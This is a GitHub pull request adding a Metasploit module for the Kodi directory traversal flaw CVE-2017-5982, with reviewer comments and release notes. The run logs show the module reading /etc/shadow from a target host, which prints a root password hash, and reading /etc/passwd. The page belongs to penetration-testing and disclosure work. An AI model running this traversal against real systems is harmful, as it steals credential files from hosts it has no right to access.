Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add a sploit for CVE-2017-5982 #7980

Merged
merged 2 commits into from
Feb 22, 2017
Merged

Add a sploit for CVE-2017-5982 #7980

merged 2 commits into from
Feb 22, 2017

Conversation

jvoisin
Copy link
Contributor

@jvoisin jvoisin commented Feb 19, 2017

This PR implements a module for CVE-2017-5982 for the kodi mediacenter, loosely based on auxiliary/scanner/http/clansphere_traversal.

Verification

List the steps needed to make sure this thing works

  • Get a working kodi setup. I used libreelec since I'm lazy it just works™
  • Start msfconsole
  • use use auxiliary/scanner/http/kodi_traversal
  • Set RPORT and RHOST
  • run
  • Verify that you get the file you requested

Complete run

msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > info 

       Name: Kodi 17.1 Local File Inclusion Vulnerability
     Module: auxiliary/scanner/http/kodi_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-02-12

Provided by:
  Eric Flokstra
  jvoisin

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      10               yes       The max traversal depth to root directory
  FILE       /etc/shadow      yes       The file to obtain
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.0.31     yes       The target address range or CIDR identifier
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path to the web application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal flaw found in Kodi 17.1.

References:
  https://cvedetails.com/cve/CVE-2017-5982/

msf auxiliary(kodi_traversal) > show options 

Module options (auxiliary/scanner/http/kodi_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILE       /etc/shadow      yes       The file to obtain
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to the web application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(kodi_traversal) > set RPORT 8080
RPORT => 8080
msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
RHOSTS => 192.168.0.31
msf auxiliary(kodi_traversal) > run

[*] Reading '/etc/shadow'
[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219213028_default_192.168.0.31_kodi_812537.bin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf >  cat /home/jvoisin/.msf4/loot/20170219213100_default_192.168.0.31_kodi_464790.bin
[*] exec:  cat /home/jvoisin/.msf4/loot/20170219213100_default_192.168.0.31_kodi_464790.bin

systemd-network:*:::::::
root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.:::::::
nobody:*:::::::
dbus:*:::::::
system:*:::::::
sshd:*:::::::
avahi:*:::::::
msf > 

@void-in
Copy link
Contributor

void-in commented Feb 20, 2017

Is the application running with root privileges? /etc/shadow can only be read by root. /etc/passwd would be a better choice for non root users.

@jvoisin
Copy link
Contributor Author

jvoisin commented Feb 20, 2017

It depends of the deployment, but a lot of people are running it on a super-light linux (like libreelec, openelec, …), with everything running as root.

@@ -0,0 +1,40 @@
## Vulnerable Application

This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This says <= 17.1

Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).

You'll need a version lower than 17.1.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This says <17.1. is 17.1 vuln?

@@ -0,0 +1,40 @@
## Vulnerable Application

This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

generally i like to link to a zip or tgz here if possible


**Vulnerable Application Installation Steps**

Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

i get that libreelec is a kodi image essentially, but itd be nice to just have a quick thing here. Right now it looks like we're exploiting kodi but then libreelec comes out of left field.

I'd also like to say a libreelec build here that is known vuln for future proofing. in 5yrs this line wont change and someone will try a non-vuln version.

Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).

You'll need a version lower than 17.1.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

version of libreelec or kodi


## Verification Steps

A successful check of the exploit will look like this:
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

change check to run since check is a command, we dont want confusion

system:*:::::::
sshd:*:::::::
avahi:*:::::::
msf auxiliary(kodi_traversal) > info
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

get rid of this line and the next empty one

register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
OptString.new('FILE', [true, 'The file to obtain', '/etc/shadow']),
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

per @void-in if this is typically run as root this line is fine. If not, maybe it should be /etc/passwd, or the file (db) with the logins for kodi

print_good("#{fname} stored as '#{p}'")

else
print_error("Fail to obtain file for some unknown reason")
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

change " to ' here

@bwatters-r7 bwatters-r7 self-assigned this Feb 22, 2017
@bwatters-r7 bwatters-r7 merged commit 73eed10 into rapid7:master Feb 22, 2017
@bwatters-r7
Copy link
Contributor

Testing

Using http://releases.libreelec.tv/LibreELEC-RPi2.arm-7.0.3.img.gz on rpi v2

msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > info

       Name: Kodi 17.0 Local File Inclusion Vulnerability
     Module: auxiliary/scanner/http/kodi_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-02-12

Provided by:
  Eric Flokstra
  jvoisin

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      10               yes       The max traversal depth to root directory
  FILE       /etc/passwd      yes       The file to obtain
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path to the web application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal flaw found in Kodi before 
  17.1.

References:
  https://cvedetails.com/cve/CVE-2017-5982/

msf auxiliary(kodi_traversal) > set rport 8080
rport => 8080
msf auxiliary(kodi_traversal) > set rhosts <Rpi_IP>
rhosts => <Rpi_IP>
msf auxiliary(kodi_traversal) > show options

Module options (auxiliary/scanner/http/kodi_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      10               yes       The max traversal depth to root directory
   FILE       /etc/passwd      yes       The file to obtain
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     <Rpi_IP>  yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to the web application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(kodi_traversal) > run

[*] Reading '/etc/passwd'
[+] /etc/passwd stored as '/home/tmoose/.msf4/loot/20170222131455_default_<Rpi_IP>_kodi_210282.bin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(kodi_traversal) > cat /home/tmoose/.msf4/loot/20170222131455_default_<Rpi_IP>_kodi_210282.bin
[*] exec: cat /home/tmoose/.msf4/loot/20170222131455_default_<Rpi_IP>_kodi_210282.bin

systemd-network:x:193:193:systemd-network:/:/bin/sh
root:x:0:0:Root User:/storage:/bin/sh
nobody:x:65534:65534:Nobody:/:/bin/sh
dbus:x:81:81:System message bus:/:/bin/sh
system:x:430:430:service:/var/run/connman:/bin/sh
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/bin/sh
avahi:x:495:495:avahi-daemon:/var/run/avahi-daemon:/bin/sh
msf auxiliary(kodi_traversal) > 

@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Feb 22, 2017

Release Notes

The Kodi 17.0 Local File Inclusion Vulnerability module has been added to the framework. It takes advantage of a directory traversal vulnerability in the popular Kodi streaming OS/Application suite to allow arbitrary file downloads from an unpatched system.

@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Mar 6, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
module needs-docs rn-enhancement release notes enhancement
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

5 participants